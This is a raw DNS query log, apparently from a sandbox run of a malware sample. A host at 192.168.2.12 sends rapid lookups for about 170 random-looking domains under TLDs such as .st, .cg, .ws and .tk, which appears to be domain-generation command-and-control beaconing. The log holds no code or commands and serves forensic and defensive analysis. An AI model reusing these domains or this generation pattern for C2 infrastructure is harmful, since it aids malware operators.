                                                                                                                                                                    Sep 7, 2024 15:36:33.151071072 CEST192.168.2.121.1.1.10xa9d2Standard query (0)scvucsg.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:33.399847984 CEST192.168.2.121.1.1.10xa9d2Standard query (0)scvucsg.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:34.197035074 CEST192.168.2.121.1.1.10xc6e9Standard query (0)haetjkrosmpgi.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:34.306333065 CEST192.168.2.121.1.1.10xd1dfStandard query (0)meigirzoz.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:34.603240967 CEST192.168.2.121.1.1.10x138Standard query (0)ekctlbk.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:34.714087009 CEST192.168.2.121.1.1.10xa016Standard query (0)qmyiycz.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:34.978075981 CEST192.168.2.121.1.1.10xa016Standard query (0)qmyiycz.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:35.618741035 CEST192.168.2.121.1.1.10x7ca2Standard query (0)redxddu.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:35.884320021 CEST192.168.2.121.1.1.10x7ca2Standard query (0)redxddu.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:35.964894056 CEST192.168.2.121.1.1.10xd317Standard query (0)qmpie.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:36.056344032 CEST192.168.2.121.1.1.10xe64dStandard query (0)umyzdsiksu.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:36.306293011 CEST192.168.2.121.1.1.10xe64dStandard query (0)umyzdsiksu.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:36.348619938 CEST192.168.2.121.1.1.10xff36Standard query (0)unmomis.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:36.416169882 CEST192.168.2.121.1.1.10xa647Standard query (0)waxucwnjgkcgg.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:36.494398117 CEST192.168.2.121.1.1.10xbb7cStandard query (0)ycigsgcyyw.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:36.572036028 CEST192.168.2.121.1.1.10x798fStandard query (0)oavrcejpc.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:36.868956089 CEST192.168.2.121.1.1.10xac4Standard query (0)slqkcpaoigi.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:37.173464060 CEST192.168.2.121.1.1.10x5ac9Standard query (0)snmwltwzodi.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:37.431615114 CEST192.168.2.121.1.1.10x5ac9Standard query (0)snmwltwzodi.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:37.524945974 CEST192.168.2.121.1.1.10xcf58Standard query (0)qpaqgmagijd.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:37.848614931 CEST192.168.2.121.1.1.10xc24eStandard query (0)boyykkfausi.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:38.102840900 CEST192.168.2.121.1.1.10xc24eStandard query (0)boyykkfausi.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:38.243855953 CEST192.168.2.121.1.1.10x5abeStandard query (0)wgoevus.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:38.478568077 CEST192.168.2.121.1.1.10x3740Standard query (0)qkyaaqptlliqy.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:38.604798079 CEST192.168.2.121.1.1.10xd5f3Standard query (0)osveqdeqd.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:38.697221994 CEST192.168.2.121.1.1.10xd751Standard query (0)kshusamosii.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:38.775016069 CEST192.168.2.121.1.1.10xbcf6Standard query (0)rwaougs.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:38.884635925 CEST192.168.2.121.1.1.10xf299Standard query (0)yxilgkywg.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:38.978163958 CEST192.168.2.121.1.1.10x7205Standard query (0)ilmic.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:39.042212009 CEST192.168.2.121.1.1.10x991dStandard query (0)gatazbkheed.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:39.118710041 CEST192.168.2.121.1.1.10x9769Standard query (0)dxyvhai.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:39.337456942 CEST192.168.2.121.1.1.10xf59fStandard query (0)ifjxl.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:39.431279898 CEST192.168.2.121.1.1.10x9cf2Standard query (0)bqcksybkwws.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:39.525022984 CEST192.168.2.121.1.1.10x9cc5Standard query (0)xeyoysdbiya.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:39.587630033 CEST192.168.2.121.1.1.10x2b04Standard query (0)kuouqlgyoifxw.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:39.650038958 CEST192.168.2.121.1.1.10xaec4Standard query (0)wxspkgimm.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:39.947942019 CEST192.168.2.121.1.1.10x47e4Standard query (0)lrnmqjyreikkk.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:40.025172949 CEST192.168.2.121.1.1.10x6349Standard query (0)gmespmwzeuf.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:40.321847916 CEST192.168.2.121.1.1.10xa9ebStandard query (0)ecwze.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:40.478110075 CEST192.168.2.121.1.1.10x276aStandard query (0)cxmse.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:40.572081089 CEST192.168.2.121.1.1.10x6337Standard query (0)geghlombkvf.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:40.665971994 CEST192.168.2.121.1.1.10xa29eStandard query (0)qupmgwu.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:40.696871042 CEST192.168.2.121.1.1.10x15deStandard query (0)unmomis.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:41.213026047 CEST192.168.2.121.1.1.10xe7eeStandard query (0)aqolzouaexf.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:41.290570974 CEST192.168.2.121.1.1.10xfb24Standard query (0)suuccoskyii.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:41.369393110 CEST192.168.2.121.1.1.10x21f3Standard query (0)iussd.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:41.619863033 CEST192.168.2.121.1.1.10x21f3Standard query (0)iussd.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:41.697561979 CEST192.168.2.121.1.1.10x15edStandard query (0)oqclngy.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:41.947195053 CEST192.168.2.121.1.1.10x15edStandard query (0)oqclngy.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:42.025755882 CEST192.168.2.121.1.1.10xa8a8Standard query (0)qwremcmjnq.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:42.149960041 CEST192.168.2.121.1.1.10x8776Standard query (0)ucdugwi.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:42.212745905 CEST192.168.2.121.1.1.10x122bStandard query (0)gmgmjoksogmio.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:42.415962934 CEST192.168.2.121.1.1.10xe70dStandard query (0)omspgieam.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:42.637533903 CEST192.168.2.121.1.1.10xca7Standard query (0)wkmdg.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:42.728329897 CEST192.168.2.121.1.1.10xdda0Standard query (0)aagmaun.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:42.806308985 CEST192.168.2.121.1.1.10x90daStandard query (0)kcmyuqyyqqwrd.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:42.884366989 CEST192.168.2.121.1.1.10x5834Standard query (0)cqwgxpiufns.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:42.946794987 CEST192.168.2.121.1.1.10xdf54Standard query (0)taepoqu.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:43.010118008 CEST192.168.2.121.1.1.10xb2f3Standard query (0)kuwtapc.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:43.071866989 CEST192.168.2.121.1.1.10x4fe1Standard query (0)kywmoiqcuuoi.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:43.134413958 CEST192.168.2.121.1.1.10xeefaStandard query (0)oomoyklkajgl.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:43.368957043 CEST192.168.2.121.1.1.10x7320Standard query (0)ilwsm.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:43.448625088 CEST192.168.2.121.1.1.10x5423Standard query (0)uumzuzi.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:43.515604973 CEST192.168.2.121.1.1.10x49d3Standard query (0)dhxrlnwcopmk.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:43.728420973 CEST192.168.2.121.1.1.10x1a59Standard query (0)tbuufocxdo.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:43.806271076 CEST192.168.2.121.1.1.10x5d81Standard query (0)oxyiqjfpc.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:43.821965933 CEST192.168.2.121.1.1.10xe041Standard query (0)isfusus-omoab.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:43.884999037 CEST192.168.2.121.1.1.10xea71Standard query (0)siypayszdtfmr.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:44.111435890 CEST192.168.2.121.1.1.10x9bb8Standard query (0)ekmik.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:44.339992046 CEST192.168.2.121.1.1.10xc3faStandard query (0)kuwdu.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:44.587888002 CEST192.168.2.121.1.1.10xc3faStandard query (0)kuwdu.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:44.683970928 CEST192.168.2.121.1.1.10xfae8Standard query (0)nymuqze.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:44.822410107 CEST192.168.2.121.1.1.10x4943Standard query (0)omugeaoywwi.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:44.900057077 CEST192.168.2.121.1.1.10x39a6Standard query (0)agwmw.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:44.978741884 CEST192.168.2.121.1.1.10xd89dStandard query (0)fcrgsmyjqqmgw.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:45.043967962 CEST192.168.2.121.1.1.10xe596Standard query (0)hfoxvuccsm.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:45.103207111 CEST192.168.2.121.1.1.10x31c0Standard query (0)sixdbnscrug.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:45.165637016 CEST192.168.2.121.1.1.10x5eb7Standard query (0)yiajdhgumor.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:45.228276014 CEST192.168.2.121.1.1.10x4dcaStandard query (0)kgiuu.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:45.306309938 CEST192.168.2.121.1.1.10x3536Standard query (0)eugmgivcgk.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:45.368720055 CEST192.168.2.121.1.1.10x9bbdStandard query (0)lkcymygo.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:45.666641951 CEST192.168.2.121.1.1.10x20eaStandard query (0)tqgucyecqiwea.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:45.728068113 CEST192.168.2.121.1.1.10xc1Standard query (0)aeoiglgdybz.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:45.822128057 CEST192.168.2.121.1.1.10x1ff9Standard query (0)epgvcd.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:45.885593891 CEST192.168.2.121.1.1.10xfb7aStandard query (0)qdeekxfwxqwwio.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:46.106812000 CEST192.168.2.121.1.1.10x453bStandard query (0)qfazaqauuudf.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:46.165600061 CEST192.168.2.121.1.1.10x963dStandard query (0)cokimva.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:46.475222111 CEST192.168.2.121.1.1.10xd35dStandard query (0)uuugommyhnm.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:46.697264910 CEST192.168.2.121.1.1.10x115bStandard query (0)emhjqqkoamug.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:46.790602922 CEST192.168.2.121.1.1.10x8fdbStandard query (0)oepwziolkasrnq.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:47.106484890 CEST192.168.2.121.1.1.10xd988Standard query (0)spscc.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:47.166260958 CEST192.168.2.121.1.1.10xe01Standard query (0)owkkgrfcok.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:47.228322029 CEST192.168.2.121.1.1.10x9bfeStandard query (0)vavzsrskk.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:47.368774891 CEST192.168.2.121.1.1.10xb6dfStandard query (0)wyiutviawsfdc.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:47.432341099 CEST192.168.2.121.1.1.10x1be0Standard query (0)qifqoukxvsq.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:47.574759960 CEST192.168.2.121.1.1.10xd42eStandard query (0)iqytgazreom.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:47.790610075 CEST192.168.2.121.1.1.10x950cStandard query (0)nrzkjsqqhyn.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:47.853210926 CEST192.168.2.121.1.1.10x87cfStandard query (0)cgcmq.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:48.103555918 CEST192.168.2.121.1.1.10x439cStandard query (0)ajhywlykcqekg.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:48.384926081 CEST192.168.2.121.1.1.10x2833Standard query (0)huvnqpalgyefwa.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:48.462909937 CEST192.168.2.121.1.1.10x2dd9Standard query (0)tmmeurejeikav.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:48.712662935 CEST192.168.2.121.1.1.10x2dd9Standard query (0)tmmeurejeikav.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:49.337742090 CEST192.168.2.121.1.1.10xb2d4Standard query (0)uqjmnccky.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:49.589339018 CEST192.168.2.121.1.1.10x377fStandard query (0)weaowuqugyeba.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:49.605547905 CEST192.168.2.121.1.1.10x1a67Standard query (0)isfusus-omoab.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:49.665976048 CEST192.168.2.121.1.1.10x5d10Standard query (0)sbvufpbocqu.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:49.728148937 CEST192.168.2.121.1.1.10xb74cStandard query (0)smcmuam.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:49.792776108 CEST192.168.2.121.1.1.10x613bStandard query (0)gjwonmquycqkfw.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:50.044279099 CEST192.168.2.121.1.1.10x29Standard query (0)aizfgulwuzsgm.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:50.274964094 CEST192.168.2.121.1.1.10x6a2Standard query (0)wzwiueugcwo.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:50.542357922 CEST192.168.2.121.1.1.10x6a2Standard query (0)wzwiueugcwo.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:50.633873940 CEST192.168.2.121.1.1.10x2e20Standard query (0)weyagk.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:50.884954929 CEST192.168.2.121.1.1.10x2e20Standard query (0)weyagk.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:51.260968924 CEST192.168.2.121.1.1.10x5a5aStandard query (0)mwxwga.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:51.541671991 CEST192.168.2.121.1.1.10x9206Standard query (0)ekuoz.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:51.618793964 CEST192.168.2.121.1.1.10xa021Standard query (0)ickoaygaqushu.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:52.165587902 CEST192.168.2.121.1.1.10xbaStandard query (0)smquw.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:52.415591002 CEST192.168.2.121.1.1.10xbaStandard query (0)smquw.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:52.479731083 CEST192.168.2.121.1.1.10x8698Standard query (0)muwwwceoexme.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:52.571877956 CEST192.168.2.121.1.1.10x18c6Standard query (0)kqbuu.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:52.650154114 CEST192.168.2.121.1.1.10x2b29Standard query (0)cglwe.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:52.743994951 CEST192.168.2.121.1.1.10x4dc3Standard query (0)qgustkoygi.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:52.806586981 CEST192.168.2.121.1.1.10x87bdStandard query (0)oocoaefrnca.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:52.885052919 CEST192.168.2.121.1.1.10x7e23Standard query (0)lpxloacseowog.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:52.964303017 CEST192.168.2.121.1.1.10x2ac0Standard query (0)sjkwtiguc.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:53.040781021 CEST192.168.2.121.1.1.10xb6f3Standard query (0)qgobtuwgwetu.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:53.118925095 CEST192.168.2.121.1.1.10xc28bStandard query (0)swkcxqemkyy.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:53.197199106 CEST192.168.2.121.1.1.10xc8a7Standard query (0)fcrgspowj.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:53.415760040 CEST192.168.2.121.1.1.10x41b3Standard query (0)yezuwwdviwv.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:53.478092909 CEST192.168.2.121.1.1.10x29d4Standard query (0)cuyqi.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:53.759960890 CEST192.168.2.121.1.1.10x6326Standard query (0)kstkqoicmngi.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:54.056865931 CEST192.168.2.121.1.1.10x27adStandard query (0)twygkbwfadcb.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:54.103132010 CEST192.168.2.121.1.1.10xf1aaStandard query (0)iqxuony.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:54.136960030 CEST192.168.2.121.1.1.10x62b3Standard query (0)isfusus-omoab.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:54.197021961 CEST192.168.2.121.1.1.10xabe1Standard query (0)sawoamqlkq.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:54.259320974 CEST192.168.2.121.1.1.10xe6aaStandard query (0)ibuda.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:54.321819067 CEST192.168.2.121.1.1.10x52f1Standard query (0)lecieceknom.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:54.401407003 CEST192.168.2.121.1.1.10xe7b1Standard query (0)awgqemmnymggn.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:54.462543011 CEST192.168.2.121.1.1.10xd67cStandard query (0)yoyiissqdwf.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:54.697382927 CEST192.168.2.121.1.1.10x1dacStandard query (0)oxebyweqgykau.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:54.759438038 CEST192.168.2.121.1.1.10x4050Standard query (0)juqaaqbuium.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:55.024699926 CEST192.168.2.121.1.1.10x4050Standard query (0)juqaaqbuium.cgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:55.088054895 CEST192.168.2.121.1.1.10x11a0Standard query (0)ceyvmvcmh.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:55.181746960 CEST192.168.2.121.1.1.10x9b1eStandard query (0)nosaprz.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:55.260210037 CEST192.168.2.121.1.1.10x75fdStandard query (0)guqppkkcqo.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:55.306551933 CEST192.168.2.121.1.1.10xb7ceStandard query (0)sysugqx.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:55.571897030 CEST192.168.2.121.1.1.10xbe4cStandard query (0)xbkomcieq.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:55.649955988 CEST192.168.2.121.1.1.10x3a5Standard query (0)amaaiswmjmkuy.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:55.899696112 CEST192.168.2.121.1.1.10x3a5Standard query (0)amaaiswmjmkuy.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:55.979248047 CEST192.168.2.121.1.1.10xd13dStandard query (0)kzqmvgkwc.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:56.118912935 CEST192.168.2.121.1.1.10x6c85Standard query (0)hympxmzhc.stA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:56.212462902 CEST192.168.2.121.1.1.10x99c4Standard query (0)puupecdok.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:56.463365078 CEST192.168.2.121.1.1.10x99c4Standard query (0)puupecdok.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:56.793770075 CEST192.168.2.121.1.1.10x47b4Standard query (0)icamaezssick.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:56.869009972 CEST192.168.2.121.1.1.10x16e8Standard query (0)gzeefhmyfkwfdu.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:56.915601015 CEST192.168.2.121.1.1.10x523dStandard query (0)ukbwlyfymnhyha.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:57.196789026 CEST192.168.2.121.1.1.10x28bcStandard query (0)tkizdemkoeghk.rwA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:57.243668079 CEST192.168.2.121.1.1.10x4c9cStandard query (0)emwswoe.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:57.790824890 CEST192.168.2.121.1.1.10xec1fStandard query (0)ecvizge.vgA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:57.868771076 CEST192.168.2.121.1.1.10x96b1Standard query (0)xcoryiiocfk.tkA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:58.071835041 CEST192.168.2.121.1.1.10x6b59Standard query (0)ermmguooivarqu.phA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:58.134629011 CEST192.168.2.121.1.1.10x439cStandard query (0)qcqxiadjqmtwiw.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:58.197057962 CEST192.168.2.121.1.1.10x340bStandard query (0)zgqduw.cmA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:58.400111914 CEST192.168.2.121.1.1.10xe61aStandard query (0)hlmwgkiqy.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:58.649780035 CEST192.168.2.121.1.1.10xe61aStandard query (0)hlmwgkiqy.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:58.776504993 CEST192.168.2.121.1.1.10xe06bStandard query (0)msqqqkuote.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:58.837578058 CEST192.168.2.121.1.1.10xa6baStandard query (0)juosihwa.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:58.979116917 CEST192.168.2.121.1.1.10xd2abStandard query (0)cewioqc.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:59.123888016 CEST192.168.2.121.1.1.10x75c6Standard query (0)xoeehczikrlok.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:59.165611029 CEST192.168.2.121.1.1.10x690fStandard query (0)isfusus-omoab.bizA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:59.212476015 CEST192.168.2.121.1.1.10xdf59Standard query (0)oskplo.krA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:59.259318113 CEST192.168.2.121.1.1.10x862cStandard query (0)oeics.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:59.306313038 CEST192.168.2.121.1.1.10xedb9Standard query (0)yfqiwaiyiieva.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:59.353167057 CEST192.168.2.121.1.1.10x70c1Standard query (0)keeaqsiaypyuh.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:59.602807045 CEST192.168.2.121.1.1.10x70c1Standard query (0)keeaqsiaypyuh.mpA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:59.728172064 CEST192.168.2.121.1.1.10x1c22Standard query (0)sxoeffaiav.nuA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:59.774940968 CEST192.168.2.121.1.1.10xc919Standard query (0)qhsyj.wsA (IP address)IN (0x0001)false
                                                                                                                                                                    Sep 7, 2024 15:36:59.853281021 CEST192.168.2.121.1.1.10x85cdStandard query (0)uamfoggxv.nuA (IP address)IN (0x0001)false
